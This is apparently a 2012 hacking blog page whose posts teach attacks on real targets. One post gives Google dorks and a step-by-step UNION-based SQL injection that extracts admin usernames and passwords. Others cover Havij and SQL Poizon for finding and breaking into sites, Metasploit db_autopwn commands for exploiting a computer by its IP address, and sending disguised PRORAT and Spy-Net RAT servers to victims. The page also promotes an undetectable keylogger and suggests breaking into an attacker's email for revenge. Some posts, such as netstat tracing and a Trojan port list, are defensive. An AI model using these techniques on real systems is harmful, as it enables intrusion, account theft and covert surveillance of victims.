Latest: Hack Facebook Password! | Wants To Hack CellPhone | Trace Mobile Number(only US) ! | New : Best FUD Keylogger!

Featured Posts

hack mobile

Wednesday, May 30, 2012

How To Find Vulnerable Website Using SQL Poizon (Sqli Exploit Scanner) Tool

Comments Posted by wildrank on Wednesday, May 30, 2012
As we had discussed about How to Hack Website Using Havij SQL Injection in my last article. Today i am writing article on "How to find a vulnerable Website using SQL Poizon???" Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic.

I have already explained How To Find A Vulnerable Website using Dorks, but today in this article i am going to share premade software SQL Poizon which will help you to find vulnerable website. After finding vulnerable website url, use Havij Sql Injection to hack that website.
website hacking, database hacking
Don’t forget to Subscribe to our RSS feed

How To Find Vulnerable Website using SQL Poizon Software

Step 1: First download SQL Poizon Software

Step 2: Now run Sql Poizon v1.1 - The Exploit Scanner.exe file and you will get this window.

website hacking, database hacking

Step 3: Once that's open, you will have to select a dork. I am using a PHP dorp in this example. After you have selected the desired dork press on Scan and it'll show the results in the Result Pane.

website hacking, database hacking

Step 4: Now you want to send the results to the Sqli Crawler. You can do this by rightclicking in the Results Plane and select "Send to Sqli Crawler -> All"

website hacking, database hacking

Step 5: Now the Sqli Cralwer tab will open and all you have to do is press Crawl and it will check if the website is really vulnerable to SQL Injection.

website hacking, database hacking

Step 6: Now you have to press Export Results and place it somewhere where you can open it later.

website hacking, database hacking

Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,
So friends, I hope you will like this article. If you have any queries or doubts related to How To Find Vulnerable Website Using SQL Poizon (Sqli Exploit Scanner) Tool Tutorial, please mention it in comments section.

HaPPy hAcKiNg.............


Friday, May 25, 2012

Website Hacking : How to Hack Website Using Havij SQL Injection

Comments Posted by wildrank on Friday, May 25, 2012
Already I have written so many articles on website hacking in that i have explained how to find sql vulnerable website and how to hack that website database etc, today in this article I am going to write on more website hacking tutorial using Havij SQL Injection. Using Havij SQL Injection, you can easily hack website username and password.

Havji is a SQL injection tool. But is has more great skills like finding Admin panel, cracking hash. You can use it instead of the ordinary way of SQL injection. Its especially for beginners a uselful program.

By using Havij SQL Injection tool you will get bellow information of website,
  • Database Name
  • Decrypt MD5 Code
  • Table Name
  • Columns Name
  • Columns Data
Don’t forget to Subscribe to our RSS feed

Steps To Hack Website Using Havij SQL Injection


Step 1: First download Havij SQL Injection

Step 2: Run Havij SQL Injection software and copy and paste vulnerable website link as shown in figure,

Refer previous article of website hacking to find vulnerable website.


Step 3: Now click in the "Analyze" Button,


Step 4: Then It shows some messages there. Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx


Step 5: Then Move to another operation to find tables by clicking "tables" as figure shown. Now click "Get tables" Then wait some time if needed


Step 6: After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure


Step 7: In that Just put mark username and password and click "Get data"


Finally you got now username and password of the admin...

The pass will get as md5 you can crack it also using this tool as shown in figure..


Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,

So friends, I hope you will like this article. If you have any queries or doubts related to Havij SQL Injection Tutorial, please mention it in comments section.

HaPPy hAcKiNg.............


Thursday, May 17, 2012

Website Hacking : How to find a vulnerable Website?? Part 2

Comments Posted by wildrank on Thursday, May 17, 2012
As we had discussed about basic information of website hacking in my last article on wildhacker. Today i am writing article on "How to find a vulnerable Website using Dork???" Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic.

Today in this article, I am going to teach you how to find website vulnerablility using Dork. Here i have shared some Dorks which you can use to fine vulnerable Website through google.

If you have not read part 1 I strongly recommend you do: Basic Information About Website Hacking Part 1

website hacking

You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How to find a vulnerable Website Using Dork?


What is an SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

How do I know if the site is vulnerable?

Well, the most basic way to do it, and the easiest, would be to use an SQLi Scanner, such as Acunetix Web Vulnerability Scanner

Alternatively, you can search manually using something called a "Dork".

So what is a dork?

A dork is a simple search used on google ( or other search engines ) that brings up sites you are specifically looking for.

List of Google Dork:
inurl:gallery.php?id=

inurl:pages.php?id=

inurl:post.php?id=

inurl:view.php?id=

inurl:source.php?id=

inurl:index.php?id=

inurl:article?id=

Using the manual method will take a lot of trial and error.

Once you have your site, to check if it is vulnerable, simply add an apostrophe ( ' ) to the end of the url.

Example:
http://www.examplesite.com/category.php?id=5'

If the site is vulnerable, you will see the following error or something similar somewhere on the page.

" Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1 "

If you get this, the site should be vulnerable. So far so good!

How many columns?


Our next step is to find the number of columns in the database. To do this we use the ORDER BY query. We get our normal site URL, and add ORDER BY 1-- to the end of it. Example:

Quote:
http://www.examplesite.com/category.php?id=5 order by 1--

The page should then show up as normal. Now we have to increase this number until we get an error.

Quote:
http://www.examplesite.com/category.php?id=5 order by 1-- No error
http://www.examplesite.com/category.php?id=5 order by 2-- No error
http://www.examplesite.com/category.php?id=5 order by 3-- Error

We got an error on 3, so that means our number of columns is 2 (The max column number before getting an error).

Union Select Query

We use the union select statement to combine the results of multiple querys in our SQLi. To test if it works, go to our sites normal URL, and write "union select 1,2--" (without quotes) after it. In our example, we use 1,2--, but on other sites, you will usually have a different number of columns. Example: On a site with 5 columns it would be "union select 1,2,3,4,5--".

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,2--

Notice that there is a - in front of the 5. This is done to remove all text from the webpage, so we can see the results of our query on the page (Explanation. There isn't a -5 page anywhere on the site, so it uses the usual site template, but without the images and text of that specific page).

If union select worked, we should have no SQL errors. We also should now see a few numbers on the page that normally aren't there. For our example, we will say that both 1 and 2 showed up on our page.

What SQL Version does my site use?

This will be one of the easier things to do. After we have tested union (and it works!) we simply input "version()" in to one of the numbers in our URL, but these numbers have to be visible on the page, otherwise we won't be able to see the returned query result. Example:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,version()--

This will replace the number 2 on our page with the SQL version. For our example we will use version 5 and above.

Finding table names

Now we are going to get into the tables. This is where all the information you are looking for will be kept, but first, we need to find the table names. To do so, replace version() with group_concat(table_name). Then after your last column number, add from information_schema.tables--. Example:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(table_name) from information_schema.tables--

On the page you should now have a list of all the table names in the database.

Finding the column names

To find the column names we do the same thing, but replace tables with columns, but we include which table to get the column names from. If we found a table called admin. Example,

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--

Q: I get an error when I do this, or no column names are shown!

A: Magic quotes is on. To bypass this, you must convert the table name to Hex.
You can do this by going to http://www.swingnote.com/tools/texttohex.php . Our query would now look like this:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e --

Note: the 0x tells the computer the following string is in hex.

Lets say the column names were username and password.

Final Step: Getting our information.

To finish it off, we want to find out what the columns contain, otherwise, this has all been for nothing! To do so we get our normal site URL and add "union select 1,concat(username,0x3a,password) from admin--".

This will show the username and password from the table admin! Usually your password will be a hash, so you can use an online MD5 Cracker such as MD5Crack or use a program such as Cain and Abel to decrypt the password hash.

Keylogger: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from wildhacker.

So friends, I hope you will like this
How to find a vulnerable Website tutorial.
I have personally tested this dorks and found all are working. If you have any problem in above article, please mention it in comments section.

Enjoy Website Hacking ........


Monday, May 14, 2012

Hack Paypal, Facebook, Hotmail Password Using Spy-Net RAT

Comments Posted by wildrank on Monday, May 14, 2012
As we all know,On WildHacker we have discussed various hacking method to hack email account password. In this article, I am gonna post the most useful way on how to hack email account password. This hacking software used to hack email account password is Spy-Net RAT. RAT, as we all know, is Remote Administration Tool, used to hack computer remotely. Spy-Net RAT is very efficient and simple to use to hack paypal, hotmail email account password.

Basically RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it. Today in this article I am going to share one more RAT called "Cerberus Rat" to hack and steal information of victim.

Also read RAT(Remote Administration Tool) Guide For Beginners(FAQ)

hack facebook hack paypal

You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

Hack Paypal, Facebook, Hotmail Password Using Spy-Net RAT


Follow the instruction given bellow to setup Spy-Net RAT...


Saturday, May 12, 2012

Free VPN US Tutorial

Comments Posted by wildrank on Saturday, May 12, 2012
What Exactly Is A VPN?

A VPN supplies network connectivity over a possibly long physical distance. In this respect, a VPN is a form of Wide Area Network (WAN).

Using a Free VPN is the best idea if your answer is ‘Yes’ for any of the question below.
  • Do you have problems in opening certain websites like LinkedIn and Twitter at work?
  • Has your school blocked social networking sites like Facebook and Myspace?
  • Do you require to work anonymously online?
Using proxies is highly risky. May be you can use other ways to access blocked websites. But then, there is no guarantee that all of them will work. So, what can you do? Use a VPN client.

So, today in this article I am sharing free VPN tutorial which will helps to keep your computer anonymous on internet ...............just read on

vpn tutorial

You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

Free VPN US Tutorial For Windows 7

Step 1: Goto Start -> Control Panel -> Network and Internet

Choose "Network and Sharing Center"

VPN tutorial

Step 2: Next, click "Set up a new connection or network"

VPN tutorial

Step 3: Choose "Connect to a workplace"

VPN tutorial

Step 4: Now, select this option:

VPN tutorial

Step 5: Here, enter the host name:

Code:
uspptp.hotfreevpn.com


VPN tutorial

Step 6: When prompted, the user name and password are:

Code:
USERNAME: free
PASSWORD: 1234

VPN tutorial




Step 1: Goto Start -> Control Panel -> Network Connections

Choose "Connect to the network at my workplace"

VPN tutorial

Step 2: Choose "Virtual Private Network connection"

VPN tutorial

Step 3: Name the connection to whatever you'd like.

VPN tutorial

Step 4: Here, click Next.

VPN tutorial

Step 5: Now we enter the host name:

Code:
uspptp.hotfreevpn.com

VPN tutorial

Step 6: For added convenience, you can add a shortcut to your desktop, and finally click Finish.

VPN tutorial

Step 7: When prompted, the user name and password are:

Code:
USERNAME: free
PASSWORD: 1234

VPN tutorial

Note : This VPN alone surely does not guarantee full anonymity, as does no VPN, so please keep that in mind.

EnJoY....................


Wednesday, May 9, 2012

Remove Keylogger / Rat : How To Check Whether Keylogger or RAT Is Installed or Not In Your Computer

Comments Posted by wildrank on Wednesday, May 09, 2012
When someone other than you accesses your computer, your personal information may be at risk. Keyloggers and other malicious software, or malware, can be a dangerous presence on your computer, especially because you often won't notice them unless you know what to look for. These types of programs can capture each computer keystroke, stealing information such as user names, passwords, and credit card information. There are specific areas to check to see if a keylogger or malware has infected your computer.

In my previous article I have explained about "How To Track Hacker/Spammer", Today in this article I am going to explain how to check whether Keylogger or RAT is installed or not in your computer.

Don’t forget to Subscribe to our RSS feed

Normally keyloggers and RATs sends data to the hacker in regular intervals (usually every 5 to 10 minutes) by using one of the two methods below:

1: Using the Emails : where hacker configures his email ID and password while creating the server. Keylogger records the key strokes in a temp file and sends it to the hacker in form of emails. But this has a limit as most free email servers like Gmail or Yahoo or Hotmail has limit of 500 composed and received mails. So most hackers use the second method.

2: FTP server : While creating the keylogger server, hackers configure their FTP server, where they receive the logs of key strokes in the form of text file(usally labeled on the basis of current system time stamp). Hackers keylogger server uploads the files to FTP server after every few minutes interval.

If we monitor all data packages we can easily scan for one of these and then we'll have the hackers email info or FTP info. What can we do with this, you might ask; highly skilled hackers obviously won't allow this as they create a completely seperate email or FTP site which leaves no traces of them, but novice skilled hackers (there's plenty of those) will just use their own email or leaving behind information about them. An example could be that you find the name of the person from the email you backtraced - this ain't his primary email, so there's nothing valuable. From there you can look up his name on Google, you'll probably find his real email on some site; then simply try to login to it using the password from the fake email (most novice skilled hackers will have the same password).

Wireshark is a very famous network scanning hack tool which is used by hackers or network forensic experts to monitor the packet flow of their network cards like Ethernet or WLAN. It records each and every packet coming and going out of your system's Network card. Packets is just a bunch of data.

Whenever you feel anything suspicious in your system like your system is compromised or you are infected follow the steps below prior to removing the keylogger or RAT from your system.

How To Remove Keylogger / Rat From Your Computer

Steps to reverse engeneering the email or FTP servers password:

Step 1: First of all download and install Wireshark. You can easily get this simply by Googling it.
Note: While Wireshark is getting installed, ensure that it installs the Winpcap with it otherwise it won't work properly.

Step 2: Now go to the "Capture"-button in the top menu of the Wireshark and select the interface (means your network card which can be Ethernet or WLAN).

Step 3: It will now start capturing the packets through that Network card. What you have to do is just keep capturing the records for atleast 30 minutes for getting the best results. After x time, stop capturing the packets.

Step 4: Now you need to filter your results, for this go to the filter box and type FTP and SMTP one by one. Note: if you get records for FTP then hacker has used FTP server and if you didn't get FTP that means the hacker has used SMTP, so give SMTP in Filter box.

Step 5: As you scroll down you will find the “FTP username” and “Password” for victims ftp account in case FTP server is used. And if hacker has used SMTP then you will find "email address" and its "password" that hacker has used to create the server.

NOTE : This won't work in all cases, but it's certainly worth trying. Who wouldn't want revenge if some skid infected your precious PC?

Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,

So friends, I hope this How To Check Whether Keylogger or RAT Is Installed or Not In Your Computer tutorial will be useful for you. If you have any problem in this above tutorial, please mention it in comments.

Happy hacking........... :P


Monday, May 7, 2012

How To Hack A Remote Computer Using IP Address

Comments Posted by wildrank on Monday, May 07, 2012
      Hacking a remote computer is always a hot topic among hackers and crackers, a newbie hacker or someone who wants to learn hacking always ask these questions that how to hack into a computer by just knowing the IP address of victim computer.

Today in this article I am going to explain step by step procedure to hack computer using IP address. But this tutorial is possible only when your friend’s / victim computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.


Don’t forget to Subscribe to our RSS feed

How To Hack A Remote Computer Using IP Address


Step 1: First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

Step 2: You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

Step 3: Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...


Step 4: Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:


Step 5: Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

Step 6: Type db_host to make sure you are connected correctally.

Step 7: Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

Step 8: Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

Step 9: After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

Step 10: Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,

So friends, I hope this How To Hack A Remote Computer Using IP Address tutorial will be useful for you. If you have any problem in this How To Hack A Remote Computer Using IP Address tutorial, please mention it in comments.

Happy hacking!


Sunday, May 6, 2012

How to Track Hackers and Spammers | Keylogger

Comments Posted by wildrank on Sunday, May 06, 2012
Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is onboard, how it got there - but most importantly, who put it there.

By enumerating the attacker in the same way that they have enumerated the slave, you will be able to see the bigger picture and establish what you're up against. But how can you do this? Read on...

Don’t forget to Subscribe to our RSS feed

Connections make the world go round :

The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place.

How do these people find their slave?

Well, first of all, they need to get hold of the slave's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc).

With an IP address, a Hacker can find out all sorts of weird and wonderful things about their slave (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS ((Denial of Service)) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain - until recently, many realtime chat applications (such as MSN) were goldmines of information.

Your IP Address is contained as part of the Header Code on all emails that you send and webpages that you visit can store all kinds of information about you. A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting slave visits, everything about your computer from the operating system to the screen resolution can be logged and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit.

So now that you know some of the basic dangers, you're probably wondering how these people connect to a slave's machine?

Virtual and Physical Ports :

Everything that you recieve over the Internet comes as a result of other machines connecting to your computer's ports. You have two types: Physical are the holes in the back of your machine, but the important ones are Virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without, but knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.

What the phrases TCP/UDP :

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent you it. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on, and that tool is NETSTAT.

Netstat:

Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems Or Press Windows Key + R and type Cmd in Run box), and in the MSDOS Prompt, type:

netstat -a

Note : make sure you include the space inbetween the "t" and the "a"

If you're connected to the Internet when you do this, you should see something like:

track hacker

Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc.

Now, you need to know all of Netstat's various commands, so type:

netstat ?

You will get something like this:

track hacker

Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is

netstat -an

because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful.

Also,

netstat -b

will tell you what ports are open and what programs are connecting to the internet.

Types of Port :

It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port:

Well Known Ports :These run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is smtp (Simple Mail Transfer Protocol) so if you find one of these ports open (and you usually will), it's usually because of an essential function.

Registered Ports : These run on 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, Email client and so on, and they do this by opening on a random port within this range before communicating with the remote server, so don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the system that's running on them terminates (for example, type in a common website name in your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote servers). Services like MSN Messenger and ICQ usually run on these Ports.

Dynamic/Private Ports : Ranging from 49152 to 65535, these things are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap:

Note:

Well Known Ports 0 to 1023 Commonly used, little danger.
Registered Ports 1024 to 49151 Not as common, just be careful.
Dynamic/Private Ports 49152 to 65535 Be extremely suspicious.

The hunt is on  ....

Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive...they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at the following example of Netstat....

Active Connections
Proto Local Address Foreign Address State
TCPmacintosh: 27374 modem-123.tun.dialup.co.uk: 50505ESTABLISHED
TCPmacintosh: 80proxy.webcache.eng.sq: 30101 TIME_WAIT
TCP macintosh MACINTOSH: 0LISTENING
TCPmacintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0LISTENING

Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (ie for all intents and purposes, its how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages etc....you're simply connected to the net through proxy. So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is:

Run Netstat , and use:

netstat -a

then

netstat -an

So you have both Hostnames AND IP addresses.


Tracerouting :

Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address, you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you jknow how they work?

Go back to MSDOS and type

tracert *type IP address/Hostname here*

Now, what happens is, the Traceroute will show you all the computers inbetween you and the target machine, including blockages, firewalls etc. More often than not, the hostname address listed before the final one will belong to the Hacker's ISP Company. It'll either say who the ISP is somewhere in there, or else you run a second trace on the new IP/hostname address to see who the ISP Company in question is. If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as

http://www.haha.com

Well, that tells us nothing, right? Wrong....simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in.

If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 by Telnet, which will tell you how many hours ahead or behind this ISP is of GMT, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace. Similarly, a common tactic of Hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial).

Reverse DNS Query :

This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go, with regard to finding out what country (even maybe what State/City etc) someone resides, although it's actually almost impossible to find an EXACT geographical location without actually breaking into your ISP's Head Office and running off with the safe.

To run an rDNS query, simply go back to MS-DOS and type

netstat

and hit return. Any active connections will resolve to hostnames rather than a numerical format.

DNS :

DNS stands for Domain Name Server. These are machines connected to the Internet whose job it is to keep track of the IP Addresses and Domain Names of other machines. When called upon, they take the ASCII Domain Name and convert it to the relevant numeric IP Address. A DNS search translates a hostname into an IP address....which is why we can enter "www.Hotmail.com" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Well, Reverse DNS, of course, translates the IP Address into a Hostname (ie - in letters and words instead of numbers, because sometimes the Hacker will employ various methods to stop Netstat from picking up a correct Hostname).

So, for example,

298.12.87.32 is NOT a Hostname.
mail6.bol.net.au IS a Hostname.

Anyway, see the section at the end? (au) means the target lives in Australia. Most (if not all) hostnames end in a specific Country Code, thus narrowing down your search even further. If you know your target's Email Address (ie they foolishly sent you a hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the Country codes to deduce where they're from as well. You can also deduce the IP address of the sender by looking at the emails header (a "hidden" line of code which contains information on the sender)...on Hotmail for example, go to Preferences, and select the "Full Header's Visible" option. Alternatively, you can run a "Finger" Trace on the email address, at:

http://www.samspade.org

Plus, some ISP's include their name in your Email Address with them too (ie Wanadoo, Supanet etc), and your Hacker may be using an email account that's been provided by a Website hosting company, meaning this would probably have the website host's name in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously) or report abuse of that Website Provider's Email account (and thus, the Website that it goes with) to

abuse@companynamegoeshere.com

List of Ports commonly used by Trojans :

Please note that this isn't a complete list by any means, but it will give you an idea of what to look out for in Netstat. Be aware that some of the lower Ports may well be running valid services.

UDP: 1349 Back Ofrice DLL
31337 BackOfrice 1.20
31338 DeepBO
54321 BackOfrice 2000
TCP: 21 Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
23 Tiny Telnet Server
25 Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.30
31 Hackers Paradise
80 Executor
456 Hackers Paradise
555 Ini-Killer, Phase Zero, Stealth Spy
666 Satanz Backdoor
1001 Silencer, WebEx
1011 Doly Trojan
1170 Psyber Stream Server, Voice
1234 Ultors Trojan
1243 SubSeven 1.0 - 1.8
1245 VooDoo Doll
1492 FTP99CMP
1600 Shivka-Burka
1807 SpySender
1981 Shockrave
1999 BackDoor 1.00-1.03
2001 Trojan Cow
2023 Ripper
2115 Bugs
2140 Deep Throat, The Invasor
2801 Phineas Phucker
3024 WinCrash
3129 Masters Paradise
3150 Deep Throat, The Invasor
3700 Portal of Doom
4092 WinCrash
4567 File Nail 1
4590 ICQTrojan
5000 Bubbel
5000 Sockets de Troie
5001 Sockets de Troie
5321 Firehotcker
5400 Blade Runner 0.80 Alpha
5401 Blade Runner 0.80 Alpha
5402 Blade Runner 0.80 Alpha
5400 Blade Runner
5401 Blade Runner
5402 Blade Runner
5569 Robo-Hack
5742 WinCrash
6670 DeepThroat
6771 DeepThroat
6969 GateCrasher, Priority
7000 Remote Grab
7300 NetMonitor
7301 NetMonitor
7306 NetMonitor
7307 NetMonitor
7308 NetMonitor
7789 ICKiller
8787 BackOfrice 2000
9872 Portal of Doom
9873 Portal of Doom
9874 Portal of Doom
9875 Portal of Doom
9989 iNi-Killer
10067 Portal of Doom
10167 Portal of Doom
10607 Coma 1.0.9
11000 Senna Spy
11223 Progenic trojan
12223 Hack´99 KeyLogger
12345 GabanBus, NetBus
12346 GabanBus, NetBus
12361 Whack-a-mole
12362 Whack-a-mole
16969 Priority
20001 Millennium
20034 NetBus 2.0, Beta-NetBus 2.01
21544 GirlFriend 1.0, Beta-1.35
22222 Prosiak
23456 Evil FTP, Ugly FTP
26274 Delta
30100 NetSphere 1.27a
30101 NetSphere 1.27a
30102 NetSphere 1.27a
31337 Back Orifice
31338 Back Orifice, DeepBO
31339 NetSpy DK
31666 BOWhack
33333 Prosiak
34324 BigGluck, TN
40412 The Spy
40421 Masters Paradise
40422 Masters Paradise
40423 Masters Paradise
40426 Masters Paradise
47262 Delta
50505 Sockets de Troie
50766 Fore
53001 Remote Windows Shutdown
54321 SchoolBus .69-1.11
61466 Telecommando
65000 Devil

Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,

I hope this tutorial is useful in showing you both how to secure yourself against unwanted connections, and also how to determine an attacker's identity. The Internet is by no means as anonymous as some people think it is, and although this is to the detriment of people's security online, this also works both ways....it IS possible to find and stop even the most determined of attackers, you just have to be patient and keep hunting for clues which will help you put an end to their exploits.


Saturday, May 5, 2012

PRORAT - Software for Hacking computer remotely (Continued)

Comments Posted by wildrank on Saturday, May 05, 2012
In my previous article PRORAT - Remote PC access software, i mentioned about how to create PRORAT server for
hacking computer remotely.
Now, after server creation, you have to send server to victim and then install server on victim computer to hack computer remotely. I have explained this next part of hacking computer remotely using PRORAT here in this security article.


Hacking computer remotely - PRORAT:

1. Once you have created server, send this server to victim and ask him to install on his computer. If you have not read my previous article on PRORAT server creation, go back and then return here. You can bind server to say any pic or song, so that victim does not know of server installation.

2. When server is installed on victim computer, the only thing you should know is victim IP address, which you can know by various methods. I have written an article on How to Find IP Address... just read it to obtain victim IP. Or use Google for this.

3. When you know victim IP address, half part of hacking computer remotely is completed. Open Prorat on your computer and enter the victim computer IP address in text field adjacent to IP.

4. Let port remain the same. Usually this is the port opened by PRORAT server on victim computer.

5. Now hit on Connect and PRORAT will try to establish connection with server on victim computer for hacking computer remotely. Once connection with remote server is established, you can use PRORAT for hacking computer remotely.

6. You can use any of options on left option pane of PRORAT for hacking computer remotely. I will not go in details for this.

That's it. Thus, now you are able to use PRORAT for hacking computer remotely. PRORAT is used since long time to hack computer remotely and is still a working method to hack computer remotely. If you aren't able to
use PRORAT for hack computer remotely,
please mention it in comments.

Enjoy PRORAT for hacking computer remotely...


uTorrent Hack : Increase / boost Your uTorrent Download Speed

Comments Posted by wildrank on Saturday, May 05, 2012

TorrentDB offers the biggest database with torrent files. Use it to find and download torrents in easy and convenient way.

Hello Guys After successful transfer of domain, today this is my first article on wildhacker for Increasing uTorrent Download Speed.

µTorrent is a lightweight and efficient BitTorrent client for Windows or Mac with many features.So friends I am sharing this trick with you which helps you to increase the speed of uTorrent download


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

Increase Your uTorrent Download Speed

Follow the steps below for unlocking Idea 3G NetSetter modem.

1 : Download it from here http://www.utorrent.com

2 : Now Open it up and follow these screenshots tutorial:


